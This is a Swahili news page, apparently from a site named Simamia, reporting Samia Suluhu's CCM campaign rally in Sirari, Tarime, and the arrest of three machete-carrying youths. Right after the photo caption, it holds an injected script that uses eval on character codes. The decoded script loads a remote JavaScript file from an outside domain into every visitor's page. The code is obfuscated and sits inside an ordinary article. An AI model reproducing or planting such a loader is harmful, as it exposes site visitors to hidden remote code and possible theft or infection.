<p>Mgombea Mwenza wa Urais kupitia CCM, Samia Hassan Suluhu akihutubia mkutano wa hadhara</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
MGOMBEA mwenza wa urais kwa tiketi ya CCM, Samia Suluhu amewasihi vijana kuacha mpango wa kufanya fujo katika kipindi cha kampeni na hata siku ya kupiga kura.
âTumepata taarifa kuwa kuna watu wamejipanga kutufanyia fujo kipindi hiki cha kampeni na kwenye uchaguzi, nasoma serikali tumejipanga vema kiulinzi…hakuna mwenye nguvu kushinda ulinzi wa serikali,â alisema Samia katika mkutano wa kampeni za CCM, uliofanyika Sirari wilaya ya Tarime mkoani Mara jana.
Katika mkutano huo, mgombea huyo mwenza alilakiwa na mabango ya kudai fidia katika maeneo ya migodi, ambapo aliahidi kushughulikia tatizo hilo, alilosema ni la muda mrefu. Bango lingine lilisema wananchi wanataka Sirari uwe mamlaka ya mji mdogo, jambo ambalo Samia aliahidi kufuatilia mchakato wake katika ofisi ya waziri mkuu.
âKwa Sirari lazima tuanze na upimaji wa maeneo na baadaye ndo tutaamua Sirari iwe mji mdogo au halmashauri,â alisema. Samia aliwasihi vijana wa CCM kujiepusha na fujo, kwani madhara ya kufanya hivyo ni makubwa kwao na familia zao.
Wakati mkutano huo ukiendelea, polisi iliwakamata vijana watatu na kuwapeleka kwenye kituo cha polisi cha Sirari. Vijana hao waliokuwa na mapanga, walileta fujo katika mkutano huo uliokuwa unahutubiwa na Samia.
Walifanya fujo hizo wakati msafara wa mgombea huyo mwenza ulipowasili uwanjani hapo, hali iliyomfanya kiongozi wa CCM aliyekuwa anatangaza kuwasili kwa Mgombea huyo, kudai kuwa CCM imechoshwa na fujo za wapinzani. Leo Samia ataendelea na ziara katika majimbo ya Serengeti, Bunda na Rorya.
Simamia is a news house where visitors will get up to date information on news, events, and so on.
Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com
Recent Comments